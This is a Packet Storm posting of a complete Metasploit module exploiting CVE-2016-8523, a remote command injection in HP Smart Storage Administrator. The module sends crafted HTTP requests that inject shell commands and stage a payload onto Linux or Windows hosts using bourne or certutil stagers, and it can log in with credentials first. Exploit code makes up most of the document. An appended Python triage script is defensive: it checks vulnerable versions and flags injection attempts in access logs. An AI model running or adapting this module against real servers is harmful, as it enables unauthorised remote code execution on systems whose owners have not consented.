HP Smart Storage Administrator 2.30.6.0 Remote Command Injection

Published 10 Feb 2017. Reported by Nicolas Mattiocco. Type: packetstorm. Source: packetstormsecurity.com

HP Smart Storage Administrator 2.30.6.0 Remote Command Injection vulnerability

Code
```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "HP Smart Storage Administrator Remote Command Injection",
      'Description'    => %q{
        This module exploits a vulnerability found in HP Smart Storage Administrator. By
        supplying a specially crafted HTTP request, it is possible to control the
        'command' variable in function isDirectFileAccess (found in ipcelmclient.php),
        which will be used in a proc_open() function. Versions prior to HP SSA 2.60.18.0 are vulnerable.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Nicolas Mattiocco (@MaKyOtOx)' # Discovery & multi-platform Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2016-8523']
        ],
      'DefaultOptions' =>
        {
          'SSL' => true
        },
      'Platform'       => %w{ linux win },
      'Targets'        =>
        [
          ['Linux', {
            'Platform'        => 'linux',
            'Arch'            => ARCH_X86,
            'CmdStagerFlavor' => 'bourne'
          }],
          ['Linux (x64)', {
            'Platform'        => 'linux',
            'Arch'            => ARCH_X86_64,
            'CmdStagerFlavor' => 'bourne'
          }],
          ['Windows', {
            'Platform'        => 'win',
            'Arch'            => ARCH_X86,
            'CmdStagerFlavor' => 'certutil'
          }],
          ['Windows (x64)', {
            'Platform'        => 'win',
            'Arch'            => ARCH_X86_64,
            'CmdStagerFlavor' => 'certutil'
          }],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jan 30 2017"
    ))

    register_options(
      [
        Opt::RPORT(2381),
        # USERNAME/PASS may not be necessary, because the anonymous access is possible
        OptString.new("USERNAME", [false, 'The username to authenticate as']),
        OptString.new("PASSWORD", [false, 'The password to authenticate with'])
      ], self.class)
  end

  def check
    @cookie = ''

    sig = Rex::Text.rand_text_alpha(8)
    cmd = "&echo%20#{sig}&echo"
    res = send_command(cmd, true)
    if not res
      vprint_error("#{peer} - Connection timed out")
      return Exploit::CheckCode::Unknown
    end

    if res.code == 200 && res.headers.to_s() =~ /#{sig}/
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  def login
    username = datastore['USERNAME']
    password = datastore['PASSWORD']

    cookie = ''

    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => '/proxy/ssllogin',
      'vars_post' => {
        'redirecturl'         => '',
        'redirectquerystring' => '',
        'user'                => username,
        'password'            => password
      }
    })

    if not res
      fail_with(Failure::Unknown, "#{peer} - Connection timed out during login")
    end

    # CpqElm-Login: success
    if res.headers['CpqElm-Login'].to_s =~ /success/
      cookie = res.get_cookies.scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || ''
    end

    cookie
  end

  def setup_stager
    execute_cmdstager(:temp => './', :linemax => 2800)
  end

  def execute_command(cmd, opts = {})
    res = send_command(cmd, false)
    if res && res.code != 200
      vprint_error("Unexpected response:\n#{res}")
      fail_with(Failure::Unknown, "There was an unexpected response")
    end
  end

  def send_command(cmd, check)
    if !datastore['USERNAME'].to_s.empty? && !datastore['PASSWORD'].to_s.empty? && @cookie.empty?
      @cookie = login
      if @cookie.empty?
        fail_with(Failure::NoAccess, "#{peer} - Login failed")
      else
        print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'")
      end
    end

    req_opts = {}

    # For the check() function, use GET method
    if check
      req_opts['uri']    = "/HPSSA/index.htm#{cmd}"
      req_opts['method'] = "GET"
    else
      req_opts['uri']       = "/HPSSA/index.htm"
      req_opts['method']    = "POST"
      req_opts['vars_post'] = {'msf' => 'red'}
      case target.opts['Platform']
      when "linux" then req_opts['data'] = "\" & #{cmd.gsub(/\.\//, "/tmp/")} & echo \""
      when "win"   then req_opts['data'] = "\" & #{cmd.gsub(/\.\//, "\.\\")} & echo \""
      end
    end

    unless @cookie.empty?
      browser_chk = 'HPSMH-browser-check=done for this session'
      curl_loc    = "curlocation-#{datastore['USERNAME']}="
      req_opts['cookie'] = "#{@cookie}; #{browser_chk}; #{curl_loc}"
    end

    send_request_cgi(req_opts)
  end

  def exploit
    @cookie = ''

    setup_stager
  end
end
```
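A defender-side triage script, added here as an example and not part of the module above or of HP's own tooling: it compares an installed SSA version against the 2.60.18.0 fix threshold stated in the module description, and flags requests to /HPSSA/index.htm in an access log whose URL-decoded target carries shell metacharacters, which is the trace the module's check() leaves in a GET request line. The combined-log regex and the sample log lines are constructed assumptions.

```python
"""Defender-side triage for the HP SSA command injection above (added example, CVE-2016-8523)."""
import re
from urllib.parse import unquote

# Fix threshold from the module description: versions prior to 2.60.18.0 are vulnerable.
FIXED_VERSION = (2, 60, 18, 0)

# Shell metacharacters that never belong in a request for the SSA front page.
SHELL_META = re.compile(r"[&|;`]|\$\(")

# Assumed Apache-style combined log layout: ip ident user [time] "METHOD target proto" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_version(version: str) -> tuple:
    """Turn a dotted version such as '2.30.6.0' into a comparable tuple of ints."""
    return tuple(int(part) for part in version.strip().split("."))


def is_vulnerable_version(version: str) -> bool:
    """True when the installed SSA build predates the fixed release."""
    return parse_version(version) < FIXED_VERSION


def suspicious_ssa_request(line: str):
    """Return (ip, method, decoded target) when a logged request looks like an injection attempt.

    Only the request line is inspected, so this catches the GET form (payload in the URI);
    the POST form carries the payload in the body and needs body logging or a WAF to see it.
    """
    match = LOG_LINE.match(line)
    if not match:
        return None
    target = unquote(match.group("target"))  # decode %20 etc. before looking for metacharacters
    if not target.startswith("/HPSSA/index.htm") or SHELL_META.search(target) is None:
        return None
    return (match.group("ip"), match.group("method"), target)


def scan_log(text: str) -> list:
    """Run every line of an access log through suspicious_ssa_request and collect the hits."""
    return [hit for hit in map(suspicious_ssa_request, text.splitlines()) if hit]


# Constructed sample log: a benign page load, a probe shaped like the module's check(), a plain POST.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Feb/2017:10:01:02 +0000] "GET /HPSSA/index.htm HTTP/1.1" 200 512
10.0.0.9 - - [10/Feb/2017:10:01:05 +0000] "GET /HPSSA/index.htm&echo%20abcdefgh&echo HTTP/1.1" 200 0
10.0.0.9 - - [10/Feb/2017:10:01:07 +0000] "POST /HPSSA/index.htm HTTP/1.1" 200 0
"""
```

Because the exploit form posts its payload in the request body, pair this request-line check with body logging or a WAF rule on the same path; the version check alone is sufficient to decide whether patching is required.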
